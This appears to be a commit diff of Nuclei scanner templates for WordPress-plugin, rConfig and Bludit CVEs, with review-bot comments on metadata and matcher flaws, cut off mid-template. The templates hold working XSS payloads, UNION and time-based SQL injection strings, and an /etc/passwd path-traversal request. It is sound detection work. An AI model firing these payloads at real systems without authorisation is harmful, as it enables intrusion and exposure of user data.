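Review bot: The matcher fires whenever the logged-in user can render `/wp-admin/options.php` and the plugin name appears on the page, which is equally true for a legitimate administrator account, so a run with full-admin credentials reports a false positive; the template should state, in `description` or a comment on the matcher, that `username`/`password` must be the restricted account created by Controlled Admin Access, or match on a marker specific to that restricted session. `classification` is missing `cve-id: CVE-2021-24215`, and `max-request: 1` should be `2` since two requests are made.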
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2021-24286
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.
|
||||||
|
remediation: Fixed in version 1.3.1
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27
|
||||||
|
- https://www.exploit-db.com/exploits/50350
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24286
|
||||||
|
- https://wordpress.org/plugins/redirect-404-to-parent/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: xss,cve,cve2023,wordpress,wpscan,authenticated,exploitdb,wp-plugin
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
condition: and
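Review bot: `cve2023` is the wrong year tag for CVE-2021-24286 — use `cve2021` — and `classification` lacks `cve-id: CVE-2021-24286`. The matcher asserts the percent-encoded form `alert%28document.domain%29`, which is what a reflection of the raw request URI looks like and does not by itself show that the `"` breakout or the `onanimationstart` handler survived decoding; if the page echoes the decoded value, matching on `onanimationstart="alert(document.domain)` is a much stronger proof, and if it only echoes the encoded URI the `verified: true` claim deserves a second look. `max-request: 1` should be `2`.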
|
|
@ -0,0 +1,57 @@
|
||||||
|
id: CVE-2021-24627
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: G Auto-Hyperlink <= 1.0.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection
|
||||||
|
reference:
|
||||||
|
- https://wordpress.org/plugins/g-auto-hyperlink/
|
||||||
|
- https://wpscan.com/vulnerability/c04ea768-150f-41b8-b08c-78d1ae006bbb
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24627
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 7.2
|
||||||
|
cve-id: CVE-2021-24627
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/g-auto-hyperlink/"
|
||||||
|
tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated
|
||||||
|
|
||||||
|
variables:
|
||||||
|
num: 999999999
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+I
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_2
|
||||||
|
words:
|
||||||
|
- "c8c605999f3d8352d7bb792cf3fdb25b"
|
||||||
|
- "Keyword"
|
||||||
|
- "g-auto-hyperlink-edit"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header_2
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
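Review bot: This template uses the deprecated top-level `requests:` key while every other template in the commit uses `http:`; switch to `http:` so it matches the current schema and lint rules. The login body ends in `wp-submit=Log+I` (truncated from `Log+In`); WordPress does not validate that value, so it still works, but it should match the sibling templates. The hard-coded `c8c605999f3d8352d7bb792cf3fdb25b` appears to be the md5 of the `num` variable — writing it as `"{{md5(num)}}"` keeps the matcher tied to the variable if the number ever changes. `metadata` has no `max-request` (two requests are sent).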
|
|
@ -0,0 +1,46 @@
|
||||||
|
id: CVE-2021-24791
|
||||||
|
info:
|
||||||
|
name: Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections
|
||||||
|
remediation: Fixed in version 1.1.14
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24791
|
||||||
|
- https://wpscan.com/vulnerability/d55caa9b-d50f-4c13-bc69-dc475641735f
|
||||||
|
- https://wordpress.org/plugins/header-footer-code-manager/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 7.2
|
||||||
|
cve-id: CVE-2021-24791
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
google-query: inurl: "/plugins/header-footer-code-manager/"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=6'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2,"Add New Snippet")'
|
||||||
|
condition: and
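Review bot: `google-query: inurl: "/plugins/header-footer-code-manager/"` is not valid YAML — the second `: ` starts a nested mapping inside a scalar and parsers reject it — so the whole template fails to load; write it as `google-query: inurl:"/plugins/header-footer-code-manager/"` (no space after `inurl:`) or quote the entire value. In the DSL, `duration` without a suffix refers, as far as I can tell, to the last response, while the other conditions are explicitly `_2`-suffixed; `duration_2>=6` makes the intent unambiguous. `max-request: 1` should be `2`.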
|
|
@ -0,0 +1,53 @@
|
||||||
|
id: CVE-2021-24915
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Contest Gallery < 13.1.0.6 - SQL injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.
|
||||||
|
remediation: Fixed in version 13.1.0.6
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac
|
||||||
|
- https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917
|
||||||
|
- https://wordpress.org/plugins/contest-gallery/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2021-24915
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
public-query: "/wp-content/plugins/contest-gallery/"
|
||||||
|
tags: cve,cve2021,wordpress,wp-plugin,wpscan,wp,contest-gallery
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'WpUserId'
|
||||||
|
- 'Username'
|
||||||
|
- 'Usermail'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'text/csv'
|
||||||
|
- 'filename='
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
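Review bot: The matcher only confirms that a CSV export with `WpUserId`/`Username`/`Usermail` columns came back, which proves the missing capability check (unauthenticated user export) but not the SQL injection the template is named for; the payload wraps `VERSION()` in the marker `0x717a6b7871` (`qzkxq`), so add `qzkxq` to the body words to confirm the injection actually executed. `public-query` is not a key used anywhere else in this commit — the sibling templates use `publicwww-query`. The tag list lacks `sqli` and `unauth`, both of which the description supports. A hit also means the scanner has pulled the full registered-user list with emails, so the output should be treated as sensitive.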
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2021-24979
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Paid Memberships Pro < 2.6.6 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting
|
||||||
|
remediation: version 2.6.6
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/fc011990-4ec1-4553-901d-4ff1f482cb79
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24979
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2021-24979
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/paid-memberships-pro/"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,wp,wordpress,wpscan,wp-plugin,xss,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(header_2, "text/html")'
|
||||||
|
- 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")'
|
||||||
|
- 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")'
|
||||||
|
condition: and
|
|
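Review bot: `max-request: 1` undercounts the template, which sends two raw requests (the login POST and the admin GET), so it should read `max-request: 2`. The tag list says `cve2023` for a 2021 CVE and should be `cve2021` to match the `cve-id` in the classification block. `remediation: version 2.6.6` would be clearer as `remediation: Fixed in version 2.6.6`, the wording the other templates in this commit use.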
@ -1,61 +1,38 @@
|
||||||
id: CVE-2021-25016
|
id: CVE-2021-25016
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Chaty < 2.8.2 - Cross-Site Scripting
|
name: Chaty Free < 2.8.3 & Pro < 2.8.2 - Cross-Site Scripting
|
||||||
author: luisfelipe146
|
author: r3Y3r53
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
|
The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting
|
||||||
remediation: Fixed in 2.8.3
|
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
|
- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25016
|
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
|
||||||
classification:
|
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
||||||
cvss-score: 6.1
|
|
||||||
cve-id: CVE-2021-25016
|
|
||||||
cwe-id: CWE-79
|
|
||||||
epss-score: 0.00095
|
|
||||||
epss-percentile: 0.39536
|
|
||||||
cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
|
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 2
|
tags: cve,cve2023,wpscan,wordpress,authenticated,wp-plugin,xss,chaty
|
||||||
vendor: premio
|
|
||||||
product: chaty
|
|
||||||
framework: wordpress
|
|
||||||
publicwww-query: "/wp-content/plugins/chaty/"
|
|
||||||
tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty
|
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /wp-login.php HTTP/1.1
|
POST /wp-login.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
|
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
redirects: true
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: dsl
|
||||||
part: body
|
dsl:
|
||||||
words:
|
- 'status_code_2 == 200'
|
||||||
- "search=</script><img src onerror=alert(document.domain)>"
|
- 'contains(body_2, "<script>alert(document.domain)</script>")'
|
||||||
- "chaty_page_chaty"
|
- 'contains(body_2, "Chaty")'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: word
|
|
||||||
part: header
|
|
||||||
words:
|
|
||||||
- text/html
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
|
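Review bot: The rewritten template appears to drop the `classification` block (cvss-metrics, cvss-score, cve-id, cwe-id, epss and cpe), the `remediation` line, the NVD reference and `max-request`, and its tag list reads `cve2023` for a 2021 CVE where the old side had `cve2021`. Old and new lines are printed here without markers, so this is inferred from the `@ -1,61 +1,38 @@` header and the unpaired lines; if it holds, the classification and remediation metadata should be carried over and the tag restored to `cve2021`. The new dsl matcher checks `contains(body_2, "Chaty")` but no longer checks the content type, which the old word matcher on `text/html` did; adding `contains(content_type_2, "text/html")` keeps the check as strict as before.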
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2021-25079
|
||||||
|
info:
|
||||||
|
name: Contact Form Entries < 1.2.4 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page
|
||||||
|
remediation: Fixed in version 1.1.7
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-25079
|
||||||
|
- https://wordpress.org/plugins/contact-form-entries/
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2021,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(header_2, "text/html")'
|
||||||
|
- "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'contact-form')"
|
||||||
|
condition: and
|
|
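Review bot: `remediation: Fixed in version 1.1.7` contradicts the name `Contact Form Entries < 1.2.4`, so one of the two versions is wrong; the wpscan entry in `reference` should settle which, and the other should be corrected. The template also has no `classification` block although every other XSS template in this commit carries `cvss-metrics`, `cvss-score`, `cve-id` and `cwe-id: CWE-79`. The description ends without a full stop, unlike the others.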
@ -0,0 +1,54 @@
|
||||||
|
id: CVE-2021-29006
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.6 - Local File Inclusion
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.
|
||||||
|
reference:
|
||||||
|
- https://github.com/mrojz/rconfig-exploit/blob/main/CVE-2021-29006-POC.py
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-29006
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 6.5
|
||||||
|
cve-id: CVE-2021-29006
|
||||||
|
cwe-id: CWE-22
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
tags: cve,cve2021,rconfig,authenticated,lfi
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /dashboard.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body_3
|
||||||
|
regex:
|
||||||
|
- 'root:.*:0:0:'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body_2
|
||||||
|
words:
|
||||||
|
- 'rconfig'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
part: header_3
|
||||||
|
status:
|
||||||
|
- 200
|
|
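Review bot: `metadata` has no `max-request` although the template issues three raw requests; it should carry `max-request: 3`. The name says `Local File Inclusion` while the description and the `CWE-22` classification describe a file disclosure via path traversal, so `rConfig 3.9.6 - Local File Disclosure` would be the accurate name. The third matcher puts `part: header_3` on a `status` matcher; as far as I can tell status matchers take no `part`, so the intent is better expressed as a dsl line `status_code_3 == 200`, but confirm against the nuclei matcher reference.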
@ -0,0 +1,53 @@
|
||||||
|
id: CVE-2021-35323
|
||||||
|
info:
|
||||||
|
name: Bludit 3.13.1 - Cross Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login
|
||||||
|
remediation: Bludit v4.0.0
|
||||||
|
reference:
|
||||||
|
- https://github.com/bludit/bludit/issues/1327
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-35323
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2021-35323
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: title:"Bludit"
|
||||||
|
tags: cve,cve2021,bludit,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /bludit/admin/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /bludit/admin/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
tokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "Bludit")'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: tokenCSRF
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"'
|
||||||
|
internal: true
|
|
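Review bot: Both raw requests hard-code the `/bludit/` path prefix, so the template only fires on installs served from that sub-directory; the other templates in this commit address the application root, and the prefix should be dropped or made configurable. The CSRF-token extractor uses a greedy `value="(.*)"`, which over-captures whenever further attributes follow on the same line; `value="([^"]+)"` captures just the token. `metadata` also lacks `max-request: 2` for the two requests sent.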
@ -0,0 +1,47 @@
|
||||||
|
id: CVE-2022-0228
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Popup Builder < 4.0.7 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The Popup Builder WordPress plugin before 4.0.7 does not validate and properly escape the orderby and order parameters before using them in a SQL statement in the admin dashboard, which could allow high privilege users to perform SQL injection.
|
||||||
|
remediation: update to v.4.0.7
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/22facac2-52f4-4e5f-be59-1d2934b260d9
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0228
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 7.2
|
||||||
|
cwe-id: CWE-89
|
||||||
|
cve-id: 2022-0228
|
||||||
|
cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/popup-builder/"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,popup-builder
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 15s
|
||||||
|
GET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration_2>=7'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains_all(body_2, "first name", "last name", "email")'
|
||||||
|
- 'contains(content_type_2, "application/octet-stream")'
|
||||||
|
condition: and
|
|
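Review bot: `cve-id: 2022-0228` lacks the `CVE-` prefix and should read `cve-id: CVE-2022-0228` so it matches `id` and the format every other template in this commit uses. The tag list omits `sqli` and `authenticated` even though the template logs in first and is a SQL injection check; the sibling templates tag both. `remediation: update to v.4.0.7` would be clearer as `remediation: Fixed in version 4.0.7`.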
@ -0,0 +1,44 @@
|
||||||
|
id: CVE-2022-0533
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Ditty (formerly Ditty News Ticker) WordPress plugin before 3.0.15 is affected by a Reflected Cross-Site Scripting (XSS) vulnerability.
|
||||||
|
remediation: upgrade to v.3.0.15
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/40f36692-c898-4441-ad24-2dc17856bd74
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0533
|
||||||
|
- https://vulners.com/cve/CVE-2022-0533
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2022,xss,ditty,wp,wordpress,wpscan,wp-plugin,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
